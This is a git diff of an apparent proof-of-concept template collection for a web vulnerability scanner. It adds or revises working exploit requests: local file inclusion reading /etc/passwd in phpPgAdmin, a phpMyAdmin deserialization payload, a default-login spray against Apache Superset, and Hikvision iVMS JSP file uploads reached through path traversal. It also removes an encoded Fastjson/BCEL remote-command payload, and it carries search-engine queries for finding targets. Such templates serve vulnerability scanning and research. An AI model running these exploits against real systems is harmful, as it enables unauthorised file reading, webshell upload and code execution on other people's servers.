diff --git a/date.txt b/date.txt
index 18af8d7e28..a1e4e7fb87 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240902
+20240903
diff --git a/poc.txt b/poc.txt
index 2f04f118f1..d8c41f4508 100644
--- a/poc.txt
+++ b/poc.txt
@@ -826,6 +826,7 @@
./poc/api/api-nytimes.yaml
./poc/api/api-onelogin-472.yaml
./poc/api/api-onelogin.yaml
+./poc/api/api-onyphe.yaml
./poc/api/api-open-page-rank.yaml
./poc/api/api-opengraphr.yaml
./poc/api/api-openweather-473.yaml
@@ -72591,6 +72592,7 @@
./poc/other/fast-velocity-minify-34342709323e9cee9cbfa898dc1ee0a1.yaml
./poc/other/fast-velocity-minify.yaml
./poc/other/fastadmin-framework.yaml
+./poc/other/fastbee.yaml
./poc/other/fastcgi-echo.yaml
./poc/other/fastdup-4d937436569e469e00e1b26c70c6dd2f.yaml
./poc/other/fastdup-d463033e6c4a961471bff9c9179f1c0e.yaml
@@ -79356,6 +79358,7 @@
./poc/other/meow-gallery-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/meow-gallery-plugin.yaml
./poc/other/meow-gallery.yaml
+./poc/other/mercurial-hgignore.yaml
./poc/other/mercurial.yaml
./poc/other/merge-minify-refresh-0c0b173e2bd6f7b85f9b9b87ba38121b.yaml
./poc/other/merge-minify-refresh-5b8fc85b1483f7f13e56a98101e86360.yaml
diff --git a/poc/api/api-onyphe.yaml b/poc/api/api-onyphe.yaml
new file mode 100644
index 0000000000..8e373aa19b
--- /dev/null
+++ b/poc/api/api-onyphe.yaml
@@ -0,0 +1,46 @@
+id: api-onyphe
+
+info:
+ name: Onyphe API Test
+ author: 0xpugazh
+ severity: info
+ description: Cyber Defense Search Engine and Attack Surface Management
+ reference:
+ - https://www.onyphe.io/docs
+ metadata:
+ verified: true
+ max-request: 1
+ tags: token-spray,onyphe
+
+self-contained: true
+
+http:
+ - method: GET
+ path:
+ - "https://www.onyphe.io/api/v2/user"
+
+ headers:
+ Authorization: Bearer {{token}}
+ Content-Type: application/json
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"apikey":"'
+ - '"apis":'
+ - '"@timestamp":'
+ - '"@category":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4b0a004830460221009fbed819ee5f0de6054a6047d01ebacb9d75d95720706390d43f106acab4f6dd022100fe6c8c822772b3c74bbdbda483facd2f7b9f791c446871c3de34417474affd3c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml
index e714f96cca..fda684a006 100644
--- a/poc/cve/cve-2008-5587.yaml
+++ b/poc/cve/cve-2008-5587.yaml
@@ -1,27 +1,28 @@
id: CVE-2008-5587
-
info:
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
author: dhiyaneshDK
severity: medium
- reference: https://www.exploit-db.com/exploits/7363
-
+ description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/7363
+ - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
+ - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
+ - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
+ classification:
+ cve-id: CVE-2008-5587
metadata:
- shodan-query: 'http.title:"phpPgAdmin"'
- description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."
-
+ shodan-query: http.title:"phpPgAdmin"
+ tags: cve,cve2008,lfi,phppgadmin
requests:
- method: GET
path:
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
-
matchers-condition: and
matchers:
-
- type: regex
regex:
- "root:[x*]:0:0"
-
- type: status
status:
- 200
diff --git a/poc/cve/cve-2009-1151.yaml b/poc/cve/cve-2009-1151.yaml
index cc013e8a10..3984eacf94 100644
--- a/poc/cve/cve-2009-1151.yaml
+++ b/poc/cve/cve-2009-1151.yaml
@@ -1,21 +1,15 @@
id: CVE-2009-1151
+
info:
- name: PhpMyAdmin Scripts - Remote Code Execution
+ name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
author: princechaddha
- severity: critical
- description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
+ severity: high
+ description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
- - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
- - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- - https://nvd.nist.gov/vuln/detail/CVE-2009-1151
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10
- cve-id: CVE-2009-1151
- cwe-id: CWE-77
- tags: cve,cve2009,phpmyadmin,rce,deserialization,kev
+
+
requests:
- raw:
- |
@@ -26,13 +20,13 @@ requests:
Content-Type: application/x-www-form-urlencoded
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: regex
regex:
- "root:.*:0:0:"
-
-# Enhanced by mp on 2022/07/06
diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml
index 668fd715ec..0cf11fcf80 100644
--- a/poc/cve/cve-2016-6210.yaml
+++ b/poc/cve/cve-2016-6210.yaml
@@ -1,10 +1,9 @@
id: CVE-2016-6210
-
info:
name: OpenSSH username enumeration < v7.3
author: iamthefrogy,forgedhallpass
severity: medium
-
+ tags: cve,cve2016,network,openssh
description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities.
reference:
- http://seclists.org/fulldisclosure/2016/Jul/51
@@ -16,18 +15,15 @@ info:
cvss-score: 5.9
cve-id: CVE-2016-6210
cwe-id: CWE-200
-
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"
-
matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)'
-
extractors:
- type: regex
regex:
- - '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
\ No newline at end of file
+ - '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
diff --git a/poc/cve/cve-2018-1271.yaml b/poc/cve/cve-2018-1271.yaml
index ccf03eab13..548327e206 100644
--- a/poc/cve/cve-2018-1271.yaml
+++ b/poc/cve/cve-2018-1271.yaml
@@ -1,18 +1,20 @@
id: CVE-2018-1271
-
info:
name: Spring MVC Directory Traversal Vulnerability
author: hetroublemakr
severity: medium
- reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
-
+ description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.
+ reference:
+ - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
+ - https://pivotal.io/security/cve-2018-1271
+ - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699
+ - https://access.redhat.com/errata/RHSA-2018:1320
classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 5.90
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 5.9
cve-id: CVE-2018-1271
cwe-id: CWE-22
- description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack."
-
+ tags: cve,cve2018,spring,lfi,traversal
requests:
- method: GET
path:
diff --git a/poc/cve/cve-2021-44451.yaml b/poc/cve/cve-2021-44451.yaml
index bc69c3ca6e..1d944fccd0 100644
--- a/poc/cve/cve-2021-44451.yaml
+++ b/poc/cve/cve-2021-44451.yaml
@@ -1,34 +1,42 @@
id: CVE-2021-44451
info:
- name: Apache Superset Default Login
+ name: Apache Superset - Default Login
author: dhiyaneshDK
- severity: high
- description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
- remediation: Users should upgrade to Apache Superset 1.4.0 or higher.
+ severity: medium
+ description: |
+ Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
+ - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
- tags: apache, default-login
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
cve-id: CVE-2021-44451
+ cwe-id: CWE-522
+ metadata:
+ verified: true
+ shodan-query: http.favicon.hash:1582430156
+ tags: cve,cve2021,apache,superset,default-login
requests:
- raw:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
- Origin: {{BaseURL}}
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
- Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
- Referer: {{BaseURL}}/admin/airflow/login
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
+ - |
+ GET /dashboard/list/ HTTP/1.1
+ Host: {{Hostname}}
+
attack: pitchfork
payloads:
username:
@@ -36,32 +44,25 @@ requests:
password:
- admin
- extractors:
- - type: regex
- name: csrf_token
- group: 1
- part: body
- internal: true
- regex:
- - 'value="(.*?)">'
-
+ req-condition: true
+ cookie-reuse: true
matchers-condition: and
matchers:
- type: word
- part: body
- condition: and
+ part: header_2
words:
- - 'Redirecting...'
- - 'Redirecting...'
+ - 'session'
- type: word
- part: header
+ part: body_3
words:
- - 'session'
+ - 'DashboardFilterStateRestApi'
- - type: status
- status:
- - 302
-
-# Enhanced by mp on 2022/03/02
+ extractors:
+ - type: regex
+ name: csrf_token
+ group: 1
+ part: body
+ regex:
+ - 'name="csrf_token" type="hidden" value="(.*)"'
+ internal: true
diff --git a/poc/exposed/exposed-swagger.yaml b/poc/exposed/exposed-swagger.yaml
index 9ba88813fb..4700911c23 100644
--- a/poc/exposed/exposed-swagger.yaml
+++ b/poc/exposed/exposed-swagger.yaml
@@ -13,19 +13,73 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/swagger/..;/swagger/index.html"
- - "{{BaseURL}}/swagger-ui/..;/swagger-ui/index.html"
- - "{{BaseURL}}/api/..;/api/"
- - "{{BaseURL}}/api/..;/api/docs/"
- - "{{BaseURL}}/api-doc/..;/api-doc"
- - "{{BaseURL}}/api-docs/..;/api-docs"
- - "{{BaseURL}}/docs/..;/docs/index.html"
- - "{{BaseURL}}/api/..;/api/swagger-ui.html"
- - "{{BaseURL}}/swagger/..;/swagger/ui/index"
- - "{{BaseURL}}/api/..;/api/swagger/index.html"
- - "{{BaseURL}}/v1/..;/v1/"
+ - "{{BaseURL}}/swagger/"
+ - "{{BaseURL}}/swagger/index.html"
+ - "{{BaseURL}}/swagger-ui/index.html"
+ - "{{BaseURL}}/swagger-ui.html"
+ - "{{BaseURL}}/api/"
+ - "{{BaseURL}}/api/docs"
+ - "{{BaseURL}}/api-doc"
+ - "{{BaseURL}}/api-docs"
+ - "{{BaseURL}}/docs/index.html"
+ - "{{BaseURL}}/docs/"
+ - "{{BaseURL}}/docs/swagger-ui.html"
+ - "{{BaseURL}}/api/swagger-ui.html"
+ - "{{BaseURL}}/swagger/ui/index.html"
+ - "{{BaseURL}}/swagger/ui/index"
+ - "{{BaseURL}}/api/swagger/index.html"
+ - "{{BaseURL}}/api/swagger/ui/index"
+ - "{{BaseURL}}/api/swagger-ui/index.html"
+ - "{{BaseURL}}/api/docs/index.html"
+ - "{{BaseURL}}/api/doc/index.html"
+ - "{{BaseURL}}/api/index.html"
+ - "{{BaseURL}}/api/v1/swagger/index.html"
+ - "{{BaseURL}}/api/v1/swagger-ui/index.html"
+ - "{{BaseURL}}/api/v1/swagger/ui/index"
+ - "{{BaseURL}}/api/v1/docs/index.html"
+ - "{{BaseURL}}/api/v1/docs/swagger-ui/index.html"
+ - "{{BaseURL}}/api/v1/docs/swagger/index.html"
+ - "{{BaseURL}}/api/v2/swagger/index.html"
+ - "{{BaseURL}}/api/v2/docs/swagger-ui/index.html"
+ - "{{BaseURL}}/api/v2/docs/swagger/index.html"
+ - "{{BaseURL}}/api/v2/swagger-ui/index.html"
+ - "{{BaseURL}}/api/v2/swagger/ui/index"
+ - "{{BaseURL}}/api/v2/docs/index.html"
+ - "{{BaseURL}}/api/v3/swagger/index.html"
+ - "{{BaseURL}}/api/v3/swagger-ui/index.html"
+ - "{{BaseURL}}/api/v3/docs/swagger-ui/index.html"
+ - "{{BaseURL}}/api/v3/docs/swagger/index.html"
+ - "{{BaseURL}}/api/v3/swagger/ui/index"
+ - "{{BaseURL}}/api/v3/docs/index.html"
+ - "{{BaseURL}}/docs/swagger-ui/index.html"
+ - "{{BaseURL}}/v1/swagger/index.html"
+ - "{{BaseURL}}/v1/api"
+ - "{{BaseURL}}/v1/swagger-ui/index.html"
+ - "{{BaseURL}}/v1/swagger/ui/index"
+ - "{{BaseURL}}/v1/docs/index.html"
+ - "{{BaseURL}}/v1/api-docs/index.html"
+ - "{{BaseURL}}/v2/swagger/index.html"
+ - "{{BaseURL}}/v2/api"
+ - "{{BaseURL}}/v2/api-docs/index.html"
+ - "{{BaseURL}}/v2/swagger-ui/index.html"
+ - "{{BaseURL}}/v2/swagger/ui/index"
+ - "{{BaseURL}}/v2/docs/index.html"
+ - "{{BaseURL}}/v3/swagger/index.html"
+ - "{{BaseURL}}/v3/api-docs/index.html"
+ - "{{BaseURL}}/v3/swagger-ui/index.html"
+ - "{{BaseURL}}/v3/api"
+ - "{{BaseURL}}/v3/swagger/ui/index"
+ - "{{BaseURL}}/v3/docs/index.html"
+ - "{{BaseURL}}/"
+ - "{{BaseURL}}/doc/"
+ - "{{BaseURL}}/v0/"
+ - "{{BaseURL}}/v1/"
+ - "{{BaseURL}}/v2/"
+ - "{{BaseURL}}/v3/"
+ - "{{BaseURL}}/api/schema/swagger-ui/"
+
matchers:
- type: word
words:
- - "swagger-ui-"
+ - "Swagger UI"
diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml
index 538f6fd6d5..e86e8491d1 100644
--- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml
+++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml
@@ -1,20 +1,19 @@
id: HiKVISION
info:
- name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability
+ name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability
+ There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets
metadata:
fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台"
hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
-
http:
- raw:
- |
- POST /center/api/files;.html HTTP/1.1
+ POST /svm/api/external/report HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
@@ -25,11 +24,17 @@ http:
<%out.print("test");%>
------WebKitFormBoundary9PggsiM755PLa54a--
-
+ - |
+ GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
+
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- - 'contains(body_1, "test.jsp")'
+ - 'contains(body_1, "data")'
+ - 'status_code_2 == 200'
+ - 'contains(body_2, "test")'
condition: and
diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml
index 0ebd67934b..7e328a8b1b 100644
--- a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml
+++ b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml
@@ -1,27 +1,50 @@
id: HIKVISION
info:
- name: HIKVISION
- author: Zero Trust Security Attack and Defense Laboratory
+ name: HHIKVISION iVMS-8700 upload Webshell file
+ author: zerZero Trust Security Attack and Defense Laboratory
severity: high
description: |
- There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability
+ HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file
metadata:
- fofa-query: app="HIKVISION-综合安防管理平台"
- hunter-query: web.title="综合安防管理平台"
+ fofa-query: icon_hash="-911494769"
+ hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
+variables:
+ str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding'
+
http:
- raw:
- |
- POST /bic/ssoService/v1/applyCT HTTP/1.1
+ POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1
Host: {{Hostname}}
- Content-Type: application/json
- Testcmd: whoami
-
- {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}}
+ User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Length: 184
+ Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15
+
+ --c4155aff43901a8b2a19a4641a5efa15
+ Content-Disposition: form-data; name="fileUploader"; filename="test.jsp"
+ Content-Type: image/jpeg
+
+ {{randstr}}
